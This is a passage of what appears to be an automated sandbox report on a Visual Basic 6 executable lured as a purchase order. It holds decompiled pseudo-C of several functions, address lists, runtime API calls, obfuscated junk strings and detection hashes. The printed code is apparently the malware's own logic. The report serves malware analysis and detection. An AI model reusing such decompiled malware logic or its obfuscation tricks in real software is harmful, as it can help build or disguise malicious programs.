									_v128 = _v128 & 0x00000000;
								} else {
									_push(0x108);
									_push(0x40f9cc);
									_push(_v80);
									_push(_v84);
									L00401558();
									_v128 = _t328;
								}
								_t329 = _v76;
								_v44 = _t329;
								L00401552();
								_push(0x427cfc);
								L00401516();
								return _t329;
							} else {
								_v40 = _t314;
								L00401552();
								_v64 = 0x206e9a;
								_v72 = 3;
								_t379 =  &_v72;
								_push(_t379);
								L00401420();
								L00401588();
								_push(_t379);
								L00401426();
								L00401588();
								_t380 = _v52;
								_v128 = _t380;
								_v52 = _v52 & 0x00000000;
								_push(0xa9);
								L00401588();
								_push(_t380);
								L0040141A();
								L00401588();
								_push( &_v52);
								_push( &_v48);
								_push( &_v44);
								_push(3);
								L004014E0();
								L0040158E();
								_push(L"OPLBETS");
								L004014B0();
								L00401588();
								_t384 = _v52;
								_v132 = _t384;
								_v52 = _v52 & 0x00000000;
								_push(0);
								_push(0xffffffff);
								_push(1);
								_push(0x720035);
								L0040140E();
								L00401588();
								_push(_t384);
								L00401588();
								_push(_t384);
								_push(_v36);
								L00401414();
								L00401588();
								_push( &_v52);
								_push( &_v48);
								_push( &_v44);
								_push(3);
								L004014E0();
								goto L22;
							}
						}
					} else {
						_v40 = _t277;
						continue;
					}
					goto L76;
				}
				 *[fs:0x0] = _v36;
				return 0;
				goto L76;
			}

0x00427566
0x00427566
0x00427566
0x00427566
0x00427567
0x00427569
0x0042756c
0x00427577
0x00427578
0x0042757f
0x00427582
0x00427587
0x00427588
0x00427589
0x0042758a
0x0042758d
0x00427594
0x0042759b
0x004275a2
0x004275a9
0x004275b0
0x004275b7
0x004275be
0x004275cf
0x004275d7
0x004275de
0x004275e0
0x004275e5
0x004275c7
0x004275ca
0x00427601
0x00427606
0x00427607
0x00427609
0x0042760a
0x0042760b
0x00427616
0x00427617
0x00427623
0x00427628
0x00427629
0x0042762a
0x0042762b
0x0042762e
0x0042763b
0x00427640
0x00427647
0x00427654
0x0042765c
0x00427660
0x00427661
0x0042766d
0x00427687
0x0042766f
0x0042766f
0x00427674
0x00427679
0x0042767e
0x0042767e
0x004276a2
0x004276a6
0x004276ab
0x004276ba
0x004276c0
0x004276c2
0x004276c9
0x004276e8
0x004276cb
0x004276cb
0x004276d0
0x004276d5
0x004276d8
0x004276db
0x004276e0
0x004276e0
0x004276ef
0x004276f7
0x004276f8
0x004276fb
0x004276fc
0x00427701
0x00427702
0x0042770c
0x00427711
0x00427712
0x00427715
0x00427723
0x0042772a
0x0042772e
0x00427732
0x00427733
0x00427735
0x00427740
0x00427748
0x0042774c
0x0042774d
0x0042774f
0x00427754
0x0042775d
0x004278f5
0x004278fc
0x00427919
0x004278fe
0x004278fe
0x00427903
0x00427908
0x0042790d
0x0042790d
0x0042793d
0x00427941
0x00427946
0x00427951
0x00427957
0x00427959
0x00427960
0x0042797f
0x00427962
0x00427962
0x00427967
0x0042796c
0x0042796f
0x00427972
0x00427977
0x00427977
0x00427989
0x0042798e
0x00427994
0x004279cf
0x004279d7
0x004279dc
0x00427763
0x0042776a
0x00427787
0x0042776c
0x0042776c
0x00427771
0x00427776
0x0042777b
0x0042777b
0x004277ab
0x004277af
0x004277b4
0x004277c3
0x004277c9
0x004277cb
0x004277d2
0x004277f1
0x004277d4
0x004277d4
0x004277d9
0x004277de
0x004277e1
0x004277e4
0x004277e9
0x004277e9
0x004277fb
0x004277fe
0x004279fa
0x00427a00
0x00427a02
0x00427a11
0x00427a1b
0x00427a23
0x00427a26
0x00427a2d
0x00427a3c
0x00427a45
0x00427a4a
0x00427a51
0x00427a58
0x00427a6d
0x00427a80
0x00427a9a
0x00427a82
0x00427a82
0x00427a87
0x00427a8c
0x00427a91
0x00427a91
0x00427ab5
0x00427ab9
0x00427abe
0x00427ac9
0x00427acf
0x00427ad1
0x00427ad8
0x00427af4
0x00427ada
0x00427ada
0x00427adf
0x00427ae4
0x00427ae7
0x00427aea
0x00427aef
0x00427aef
0x00427afb
0x00427b00
0x00427b07
0x00427b15
0x00427b2f
0x00427b17
0x00427b17
0x00427b1c
0x00427b21
0x00427b26
0x00427b26
0x00427b4a
0x00427b4e
0x00427b53
0x00427b62
0x00427b65
0x00427b67
0x00427b6e
0x00427b87
0x00427b70
0x00427b70
0x00427b72
0x00427b77
0x00427b7a
0x00427b7d
0x00427b82
0x00427b82
0x00427b8d
0x00427b8e
0x00427b93
0x00427b96
0x00427b98
0x00427b99
0x00427b9a
0x00427b9b
0x00427b9c
0x00427ba1
0x00427ba6
0x00427bab
0x00427bb5
0x00427bba
0x00427bbb
0x00427bbe
0x00427bc5
0x00427bcb
0x00427bd2
0x00427bd6
0x00427bd7
0x00427bd9
0x00427bde
0x00427be1
0x00427be4
0x00427bef
0x00427bf1
0x00427c00
0x00427c03
0x00427c06
0x00427d25
0x00427d25
0x00427d2a
0x00427d2d
0x00427d2e
0x00427d2f
0x00427d3a
0x00427d3b
0x00427d42
0x00427d45
0x00427d4a
0x00427d4b
0x00427d4c
0x00427d4d
0x00427d50
0x00427d5e
0x00427d78
0x00427d60
0x00427d60
0x00427d65
0x00427d6a
0x00427d6f
0x00427d6f
0x00427d93
0x00427d97
0x00427d9c
0x00427d9f
0x00427da6
0x00427db0
0x00427dba
0x00427dbb
0x00427dbc
0x00427dbd
0x00427dc6
0x00427dcc
0x00427dce
0x00427dd5
0x00427df1
0x00427dd7
0x00427dd7
0x00427ddc
0x00427de1
0x00427de4
0x00427de7
0x00427dec
0x00427dec
0x00427df8
0x00427e04
0x00427e1e
0x00427e06
0x00427e06
0x00427e0b
0x00427e10
0x00427e15
0x00427e15
0x00427e39
0x00427e3d
0x00427e42
0x00427e51
0x00427e57
0x00427e59
0x00427e60
0x00427e7c
0x00427e62
0x00427e62
0x00427e67
0x00427e6c
0x00427e6f
0x00427e72
0x00427e77
0x00427e77
0x00427e80
0x00427e84
0x00427e8b
0x00427e90
0x00000000
0x00427e90
0x00427c0f
0x00427c15
0x00427c18
0x00427c1b
0x00427c1b
0x00427c20
0x00427c25
0x00427c2a
0x00427c2f
0x00427c34
0x00427c34
0x00427a61
0x00427a64
0x00000000
0x00427a6a
0x00427a6a
0x00000000
0x00427a6a
0x00000000
0x00427a64
0x00427c45
0x00427c5f
0x00427c47
0x00427c47
0x00427c4c
0x00427c51
0x00427c56
0x00427c56
0x00427c7a
0x00427c7e
0x00427c83
0x00427c92
0x00427c98
0x00427c9a
0x00427ca1
0x00427cbd
0x00427ca3
0x00427ca3
0x00427ca8
0x00427cad
0x00427cb0
0x00427cb3
0x00427cb8
0x00427cb8
0x00427cc1
0x00427cc5
0x00427ccc
0x00427cd1
0x00427cf6
0x00427cfb
0x00427804
0x00427804
0x0042780a
0x0042780f
0x00427816
0x0042781d
0x00427820
0x00427821
0x0042782b
0x00427830
0x00427831
0x0042783b
0x00427840
0x00427843
0x00427846
0x0042784a
0x00427855
0x0042785a
0x0042785b
0x00427865
0x0042786d
0x00427871
0x00427875
0x00427876
0x00427878
0x00427883
0x00427888
0x0042788d
0x00427897
0x0042789c
0x0042789f
0x004278a2
0x004278a6
0x004278a8
0x004278aa
0x004278ac
0x004278b1
0x004278bb
0x004278c0
0x004278c7
0x004278cc
0x004278cd
0x004278d0
0x004278da
0x004278e2
0x004278e6
0x004278ea
0x004278eb
0x004278ed
0x00000000
0x004278f2
0x004277fe
0x004275cc
0x004275cc
0x00000000
0x004275cc
0x00000000
0x004275ca
0x004275f3
0x004275fe
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401336), ref: 00427582
__vbaOnError.MSVBVM60(000000FF), ref: 004275E0
__vbaErrorOverflow.MSVBVM60(000000FF), ref: 00427601
__vbaChkstk.MSVBVM60(00000000,00401336,?,?,?,000000FF), ref: 00427623
__vbaStrCopy.MSVBVM60(?,?,?,00000000,00401336,?,?,?,000000FF), ref: 0042763B
__vbaVarDup.MSVBVM60 ref: 00427654
#666.MSVBVM60(?,?), ref: 00427661
__vbaNew2.MSVBVM60(004101D4,0042A010,?,?), ref: 00427679
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?), ref: 004276A6
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FAFC,00000130,?,?,?,?,?,?,?,?), ref: 004276DB
__vbaStrVarVal.MSVBVM60(?,?,000000F3,?,?,?,?,?,?,?,?), ref: 004276FC
#616.MSVBVM60(00000000,?,?,000000F3,?,?,?,?,?,?,?,?), ref: 00427702
__vbaStrMove.MSVBVM60(00000000,?,?,000000F3,?,?,?,?,?,?,?,?), ref: 0042770C
__vbaStrCmp.MSVBVM60(00401336,00000000,00000000,?,?,000000F3,?,?,?,?,?,?,?,?), ref: 00427715
__vbaFreeStrList.MSVBVM60(00000003,?,00000000,00401336,00401336,00000000,00000000,?,?,000000F3), ref: 00427735
__vbaFreeObj.MSVBVM60 ref: 00427740
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0042774F
__vbaNew2.MSVBVM60(004101D4,0042A010), ref: 00427776
__vbaObjSet.MSVBVM60(?,00000000), ref: 004277AF
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FC94,00000128), ref: 004277E4
__vbaFreeObj.MSVBVM60(00000000,?,0040FC94,00000128), ref: 0042780A
#574.MSVBVM60(00000003), ref: 00427821
__vbaStrMove.MSVBVM60(00000003), ref: 0042782B
#519.MSVBVM60(00000000,00000003), ref: 00427831
__vbaStrMove.MSVBVM60(00000000,00000003), ref: 0042783B
__vbaStrMove.MSVBVM60(000000A9,00000000,00000003), ref: 00427855
#618.MSVBVM60(00000000,000000A9,00000000,00000003), ref: 0042785B
__vbaStrMove.MSVBVM60(00000000,000000A9,00000000,00000003), ref: 00427865
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000,00000000,000000A9,00000000,00000003), ref: 00427878
__vbaFreeVar.MSVBVM60 ref: 00427883
#523.MSVBVM60(OPLBETS), ref: 0042788D
__vbaStrMove.MSVBVM60(OPLBETS), ref: 00427897
__vbaStrI4.MSVBVM60(00720035,00000001,000000FF,00000000,OPLBETS), ref: 004278B1
__vbaStrMove.MSVBVM60(00720035,00000001,000000FF,00000000,OPLBETS), ref: 004278BB
__vbaStrMove.MSVBVM60(00000000,00720035,00000001,000000FF,00000000,OPLBETS), ref: 004278C7
#712.MSVBVM60(?,00000000,00000000,00720035,00000001,000000FF,00000000,OPLBETS), ref: 004278D0
__vbaStrMove.MSVBVM60(?,00000000,00000000,00720035,00000001,000000FF,00000000,OPLBETS), ref: 004278DA
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000,?,00000000,00000000,00720035,00000001,000000FF,00000000,OPLBETS), ref: 004278ED
__vbaNew2.MSVBVM60(004101D4,0042A010), ref: 00427908
__vbaObjSet.MSVBVM60(?,00000000), ref: 00427941
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FABC,000001C8), ref: 00427972
__vbaFreeObj.MSVBVM60(00000000,?,0040FABC,000001C8), ref: 00427989
__vbaFreeStr.MSVBVM60(004279DD), ref: 004279CF
__vbaFreeStr.MSVBVM60(004279DD), ref: 004279D7

Strings

Cavernlike6, xrefs: 00427C2F
ansamlende, xrefs: 00427BA6
Fumlende3, xrefs: 00427C20
OVERASSESSMENT, xrefs: 00427BA1
windir, xrefs: 00427640
OPLBETS, xrefs: 00427888
NONASBESTINE, xrefs: 00427B9C
Genoptrykkenes4, xrefs: 00427C2A
INTERBREEDS, xrefs: 00427C25

Memory Dump Source

Source File: 00000000.00000002.366782993.0000000000413000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.366760413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366764718.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366771153.0000000000406000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366777936.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366793825.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366797544.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366803272.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ORDEN DE COMPRA 80107.jbxd

Yara matches

Similarity

API ID: __vba$Free$Move$List$CheckHresultNew2$ChkstkError$#519#523#574#616#618#666#712CopyOverflow
String ID: Cavernlike6$Fumlende3$Genoptrykkenes4$INTERBREEDS$NONASBESTINE$OPLBETS$OVERASSESSMENT$ansamlende$windir
API String ID: 2161282878-2743512586
Opcode ID: a81532d6ec7608951fe405371510f578573f1bc3de8cf06e7b24953f39a9967b
Instruction ID: 561f6e3b9ab9037d3a1f7b5b2f46afe49da0e89a3963335ff4def18309236804
Opcode Fuzzy Hash: a81532d6ec7608951fe405371510f578573f1bc3de8cf06e7b24953f39a9967b
Instruction Fuzzy Hash: 65423A71A00218EFDB10EFA5D845FDDBBB8BF08308F60406AF506BB2A1DB795945CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00428930 Relevance: 72.0, APIs: 39, Strings: 2, Instructions: 291
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 65%

			E00428930(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a16) {
				void* _v0;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v28;
				void* _v32;
				signed int* _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				short _v52;
				char _v60;
				intOrPtr* _v64;
				signed int _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				void* _v80;
				intOrPtr* _v84;
				signed int _v88;
				void* _v92;
				signed int _v96;
				intOrPtr* _v108;
				signed int _v112;
				intOrPtr* _v116;
				signed int _v120;
				intOrPtr* _v124;
				signed int _v128;
				signed int _v132;
				signed int _t140;
				signed int** _t144;
				signed int _t147;
				signed int _t149;
				char* _t156;
				signed int _t160;
				char* _t162;
				char* _t166;
				signed int _t170;
				char* _t172;
				signed int _t178;
				signed int _t183;
				void* _t184;
				void* _t227;
				void* _t228;
				void* _t229;
				void* _t230;
				void* _t232;
				intOrPtr _t233;
				intOrPtr _t234;

				_t228 = __esi;
				_t227 = __edi;
				_t184 = __ebx;
				_t230 = _t232;
				_t233 = _t232 - 0xc;
				 *[fs:0x0] = _t233;
				L00401330();
				_v16 = _t233;
				_v12 = 0x401300;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x2c,  *[fs:0x0], 0x401336, _t229);
				L00401504();
				_v52 = 0x43d3;
				_v48 = 1;
				_v28 = _v28 & 0x00000000;
				while(1) {
					_t140 = _v28;
					if(_t140 > _v52) {
						break;
					}
					if( *0x42a010 != 0) {
						_v64 = 0x42a010;
					} else {
						_push(0x42a010);
						_push(0x4101d4);
						L0040155E();
						_v64 = 0x42a010;
					}
					_t144 =  &_v36;
					L00401564();
					_v40 = _t144;
					_t147 =  *((intOrPtr*)( *_v40 + 0x1d4))(_v40, _t144,  *((intOrPtr*)( *((intOrPtr*)( *_v64)) + 0x304))( *_v64));
					asm("fclex");
					_v44 = _t147;
					if(_v44 >= 0) {
						_v68 = _v68 & 0x00000000;
					} else {
						_push(0x1d4);
						_push(0x40fafc);
						_push(_v40);
						_push(_v44);
						L00401558();
						_v68 = _t147;
					}
					L00401552();
					_t149 = _v28 + _v48;
					if(_t149 < 0) {
						L00401438();
						_push(_t230);
						_t234 = _t233 - 0xc;
						_push(0x401336);
						_push( *[fs:0x0]);
						 *[fs:0x0] = _t234;
						_push(0x68);
						L00401330();
						_push(_t184);
						_push(_t228);
						_push(_t227);
						_v72 = _t234;
						_v68 = 0x401310;
						 *_v36 =  *_v36 & 0x00000000;
						if( *0x42a010 != 0) {
							_v108 = 0x42a010;
						} else {
							_push(0x42a010);
							_push(0x4101d4);
							L0040155E();
							_v108 = 0x42a010;
						}
						_t156 =  &_v44;
						L00401564();
						_v84 = _t156;
						_t160 =  *((intOrPtr*)( *_v84 + 0xf8))(_v84,  &_v40, _t156,  *((intOrPtr*)( *((intOrPtr*)( *_v108)) + 0x338))( *_v108));
						asm("fclex");
						_v88 = _t160;
						if(_v88 >= 0) {
							_v112 = _v112 & 0x00000000;
						} else {
							_push(0xf8);
							_push(0x40fabc);
							_push(_v84);
							_push(_v88);
							L00401558();
							_v112 = _t160;
						}
						_push(_v40);
						L004014D4();
						_v92 =  ~(0 | _t160 - 0x00760591 >= 0x00000000);
						L00401516();
						L00401552();
						if(_v92 != 0) {
							if( *0x42a010 != 0) {
								_v116 = 0x42a010;
							} else {
								_push(0x42a010);
								_push(0x4101d4);
								L0040155E();
								_v116 = 0x42a010;
							}
							_t166 =  &_v44;
							L00401564();
							_v84 = _t166;
							_t170 =  *((intOrPtr*)( *_v84 + 0x1f0))(_v84,  &_v80, _t166,  *((intOrPtr*)( *((intOrPtr*)( *_v116)) + 0x310))( *_v116));
							asm("fclex");
							_v88 = _t170;
							if(_v88 >= 0) {
								_v120 = _v120 & 0x00000000;
							} else {
								_push(0x1f0);
								_push(0x40f9cc);
								_push(_v84);
								_push(_v88);
								L00401558();
								_v120 = _t170;
							}
							_v52 = _v80;
							_v60 = 2;
							_t172 =  &_v60;
							_push(_t172);
							L004013CC();
							L00401588();
							_push(_t172);
							L004013D2();
							L00401588();
							L00401516();
							L00401552();
							L0040158E();
							if( *0x42a6c0 != 0) {
								_v124 = 0x42a6c0;
							} else {
								_push(0x42a6c0);
								_push(0x40fbb8);
								L0040155E();
								_v124 = 0x42a6c0;
							}
							_v84 =  *_v124;
							_t178 =  *((intOrPtr*)( *_v84 + 0x14))(_v84,  &_v44);
							asm("fclex");
							_v88 = _t178;
							if(_v88 >= 0) {
								_v128 = _v128 & 0x00000000;
							} else {
								_push(0x14);
								_push(0x40fba8);
								_push(_v84);
								_push(_v88);
								L00401558();
								_v128 = _t178;
							}
							_v92 = _v44;
							_t183 =  *((intOrPtr*)( *_v92 + 0x58))(_v92,  &_v40);
							asm("fclex");
							_v96 = _t183;
							if(_v96 >= 0) {
								_v132 = _v132 & 0x00000000;
							} else {
								_push(0x58);
								_push(0x40fdec);
								_push(_v92);
								_push(_v96);
								L00401558();
								_v132 = _t183;
							}
							L00401504();
							L00401516();
							L00401552();
						}
						_v68 = L"tikkendes";
						_v76 = 8;
						L0040151C();
						_push(0);
						_t162 =  &_v60;
						_push(_t162); // executed
						L004013C6(); // executed
						L00401588();
						L00401504();
						L00401516();
						L0040158E();
						L00401504();
						_push(0x428d7c);
						L00401516();
						return _t162;
					} else {
						_v28 = _t149;
						continue;
					}
					L39:
				}
				_push(0x428a4f);
				L00401516();
				return _t140;
				goto L39;
			}

0x00428930
0x00428930
0x00428930
0x00428931
0x00428933
0x00428942
0x0042894c
0x00428954
0x00428957
0x0042895e
0x0042896d
0x00428976
0x0042897b
0x00428982
0x00428989
0x0042899e
0x0042899e
0x004289a4
0x00000000
0x00000000
0x004289b1
0x004289cb
0x004289b3
0x004289b3
0x004289b8
0x004289bd
0x004289c2
0x004289c2
0x004289e6
0x004289ea
0x004289ef
0x004289fa
0x00428a00
0x00428a02
0x00428a09
0x00428a25
0x00428a0b
0x00428a0b
0x00428a10
0x00428a15
0x00428a18
0x00428a1b
0x00428a20
0x00428a20
0x00428a2c
0x00428992
0x00428995
0x00428a6e
0x00428a73
0x00428a76
0x00428a79
0x00428a84
0x00428a85
0x00428a8c
0x00428a8f
0x00428a94
0x00428a95
0x00428a96
0x00428a97
0x00428a9a
0x00428aa4
0x00428aae
0x00428ac8
0x00428ab0
0x00428ab0
0x00428ab5
0x00428aba
0x00428abf
0x00428abf
0x00428ae3
0x00428ae7
0x00428aec
0x00428afb
0x00428b01
0x00428b03
0x00428b0a
0x00428b26
0x00428b0c
0x00428b0c
0x00428b11
0x00428b16
0x00428b19
0x00428b1c
0x00428b21
0x00428b21
0x00428b2a
0x00428b2d
0x00428b3e
0x00428b45
0x00428b4d
0x00428b58
0x00428b65
0x00428b7f
0x00428b67
0x00428b67
0x00428b6c
0x00428b71
0x00428b76
0x00428b76
0x00428b9a
0x00428b9e
0x00428ba3
0x00428bb2
0x00428bb8
0x00428bba
0x00428bc1
0x00428bdd
0x00428bc3
0x00428bc3
0x00428bc8
0x00428bcd
0x00428bd0
0x00428bd3
0x00428bd8
0x00428bd8
0x00428be5
0x00428be9
0x00428bf0
0x00428bf3
0x00428bf4
0x00428bfe
0x00428c03
0x00428c04
0x00428c0e
0x00428c16
0x00428c1e
0x00428c26
0x00428c32
0x00428c4c
0x00428c34
0x00428c34
0x00428c39
0x00428c3e
0x00428c43
0x00428c43
0x00428c58
0x00428c67
0x00428c6a
0x00428c6c
0x00428c73
0x00428c8c
0x00428c75
0x00428c75
0x00428c77
0x00428c7c
0x00428c7f
0x00428c82
0x00428c87
0x00428c87
0x00428c93
0x00428ca2
0x00428ca5
0x00428ca7
0x00428cae
0x00428cc7
0x00428cb0
0x00428cb0
0x00428cb2
0x00428cb7
0x00428cba
0x00428cbd
0x00428cc2
0x00428cc2
0x00428cd4
0x00428cdc
0x00428ce4
0x00428ce4
0x00428ce9
0x00428cf0
0x00428cfd
0x00428d02
0x00428d04
0x00428d07
0x00428d08
0x00428d12
0x00428d1f
0x00428d27
0x00428d2f
0x00428d3c
0x00428d41
0x00428d76
0x00428d7b
0x0042899b
0x0042899b
0x00000000
0x0042899b
0x00000000
0x00428995
0x00428a36
0x00428a49
0x00428a4e
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401336), ref: 0042894C
__vbaStrCopy.MSVBVM60(?,?,?,?,00401336), ref: 00428976
__vbaNew2.MSVBVM60(004101D4,0042A010), ref: 004289BD
__vbaObjSet.MSVBVM60(?,00000000), ref: 004289EA
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FAFC,000001D4), ref: 00428A1B
__vbaFreeObj.MSVBVM60(00000000,?,0040FAFC,000001D4), ref: 00428A2C
__vbaFreeStr.MSVBVM60(00428A4F), ref: 00428A49

Strings

tikkendes, xrefs: 00428CE9
idolisere, xrefs: 00428D34

Memory Dump Source

Source File: 00000000.00000002.366782993.0000000000413000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.366760413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366764718.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366771153.0000000000406000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366777936.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366793825.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366797544.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366803272.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ORDEN DE COMPRA 80107.jbxd

Yara matches

Similarity

API ID: __vba$Free$CheckChkstkCopyHresultNew2
String ID: idolisere$tikkendes
API String ID: 2810356740-727755506
Opcode ID: 80c50195c741c5cfcbc4133462e8025d2644e93a7d7cabde3648bc49b75091cb
Instruction ID: 732dbeb427ea480c14a9f40b0d1d92c688c600b4378f5dc87e6125f93382610b
Opcode Fuzzy Hash: 80c50195c741c5cfcbc4133462e8025d2644e93a7d7cabde3648bc49b75091cb
Instruction Fuzzy Hash: DFC10670E01218AFCB10EFA5D859BDDBBB5BF48308F60442EE402BB2A1DB795945CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00426810 Relevance: 66.8, APIs: 34, Strings: 4, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E00426810(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				char _v28;
				void* _v32;
				char _v36;
				intOrPtr _v44;
				char _v52;
				char _v68;
				char* _v76;
				intOrPtr _v84;
				char* _v92;
				intOrPtr _v100;
				signed int _v108;
				char _v116;
				char _v120;
				void* _v124;
				signed int _v128;
				intOrPtr* _v136;
				signed int _v140;
				intOrPtr* _v144;
				signed int _v148;
				intOrPtr* _v152;
				signed int _v156;
				char* _t103;
				signed int _t106;
				char* _t108;
				char* _t111;
				short _t112;
				char* _t117;
				signed int _t123;
				char* _t127;
				signed int _t131;
				intOrPtr _t148;
				intOrPtr _t176;
				intOrPtr* _t177;

				_push(0x401336);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t176;
				L00401330();
				_v12 = _t176;
				_v8 = 0x401218;
				if( *0x42a010 != 0) {
					_v136 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v136 = 0x42a010;
				}
				_t103 =  &_v36;
				L00401564();
				_v124 = _t103;
				_t106 =  *((intOrPtr*)( *_v124 + 0x1a8))(_v124, _t103,  *((intOrPtr*)( *((intOrPtr*)( *_v136)) + 0x360))( *_v136));
				asm("fclex");
				_v128 = _t106;
				if(_v128 >= 0) {
					_v140 = _v140 & 0x00000000;
				} else {
					_push(0x1a8);
					_push(0x40faec);
					_push(_v124);
					_push(_v128);
					L00401558();
					_v140 = _t106;
				}
				L00401552();
				_push(0);
				_push(L"Scripting.FileSystemObject");
				_push( &_v52);
				L00401540();
				_t108 =  &_v52;
				_push(_t108);
				L00401546();
				_push(_t108);
				_push( &_v28);
				L0040154C();
				L0040158E();
				_v76 = L"understrygning";
				_v84 = 8;
				_v108 = _v108 | 0xffffffff;
				_v116 = 0x8002;
				_push(0x10);
				L00401330();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(1);
				_push(L"FileExists");
				_push(_v28);
				_t111 =  &_v52;
				_push(_t111); // executed
				L00401534(); // executed
				_t177 = _t176 + 0x20;
				_push(_t111);
				_t112 =  &_v116;
				_push(_t112);
				L0040148C();
				_v124 = _t112;
				L0040158E();
				if(_v124 != 0) {
					_push(_v24);
					_push(L"AIWAIN");
					L004014FE();
					L00401588();
					if( *0x42a010 != 0) {
						_v144 = 0x42a010;
					} else {
						_push(0x42a010);
						_push(0x4101d4);
						L0040155E();
						_v144 = 0x42a010;
					}
					_t127 =  &_v36;
					L00401564();
					_v124 = _t127;
					_t131 =  *((intOrPtr*)( *_v124 + 0x1a0))(_v124,  &_v120, _t127,  *((intOrPtr*)( *((intOrPtr*)( *_v144)) + 0x2fc))( *_v144));
					asm("fclex");
					_v128 = _t131;
					if(_v128 >= 0) {
						_v148 = _v148 & 0x00000000;
					} else {
						_push(0x1a0);
						_push(0x40fafc);
						_push(_v124);
						_push(_v128);
						L00401558();
						_v148 = _t131;
					}
					_v44 = _v120;
					_v52 = 3;
					_push( &_v52);
					_push( &_v68);
					L00401486();
					_push( &_v68);
					L00401570();
					L00401588();
					L00401504();
					L00401516();
					L00401552();
					_push( &_v68);
					_push( &_v52);
					_push(2);
					L00401576();
					_t177 = _t177 + 0xc;
				}
				if( *0x42a010 != 0) {
					_v152 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v152 = 0x42a010;
				}
				_t148 =  *((intOrPtr*)( *_v152));
				_t117 =  &_v36;
				L00401564();
				_v124 = _t117;
				_v108 = 0x80020004;
				_v116 = 0xa;
				_v92 = 0x80020004;
				_v100 = 0xa;
				_v76 = 0x80020004;
				_v84 = 0xa;
				L00401330();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401330();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401330();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t177 =  *0x401210;
				_t123 =  *((intOrPtr*)( *_v124 + 0x1b4))(_v124, _t148, 0x10, 0x10, 0x10, _t117,  *((intOrPtr*)(_t148 + 0x318))( *_v152));
				asm("fclex");
				_v128 = _t123;
				if(_v128 >= 0) {
					_v156 = _v156 & 0x00000000;
				} else {
					_push(0x1b4);
					_push(0x40facc);
					_push(_v124);
					_push(_v128);
					L00401558();
					_v156 = _t123;
				}
				L00401552();
				asm("wait");
				_push(0x426ba9);
				L00401516();
				L00401552();
				return _t123;
			}

0x00426815
0x00426820
0x00426821
0x0042682d
0x00426835
0x00426838
0x00426846
0x00426863
0x00426848
0x00426848
0x0042684d
0x00426852
0x00426857
0x00426857
0x00426887
0x0042688b
0x00426890
0x0042689b
0x004268a1
0x004268a3
0x004268aa
0x004268c9
0x004268ac
0x004268ac
0x004268b1
0x004268b6
0x004268b9
0x004268bc
0x004268c1
0x004268c1
0x004268d3
0x004268d8
0x004268da
0x004268e2
0x004268e3
0x004268e8
0x004268eb
0x004268ec
0x004268f1
0x004268f5
0x004268f6
0x004268fe
0x00426903
0x0042690a
0x00426911
0x00426915
0x0042691c
0x0042691f
0x00426929
0x0042692a
0x0042692b
0x0042692c
0x0042692d
0x0042692f
0x00426934
0x00426937
0x0042693a
0x0042693b
0x00426940
0x00426943
0x00426944
0x00426947
0x00426948
0x0042694d
0x00426954
0x0042695f
0x00426965
0x00426968
0x0042696d
0x00426977
0x00426983
0x004269a0
0x00426985
0x00426985
0x0042698a
0x0042698f
0x00426994
0x00426994
0x004269c4
0x004269c8
0x004269cd
0x004269dc
0x004269e2
0x004269e4
0x004269eb
0x00426a0a
0x004269ed
0x004269ed
0x004269f2
0x004269f7
0x004269fa
0x004269fd
0x00426a02
0x00426a02
0x00426a14
0x00426a17
0x00426a21
0x00426a25
0x00426a26
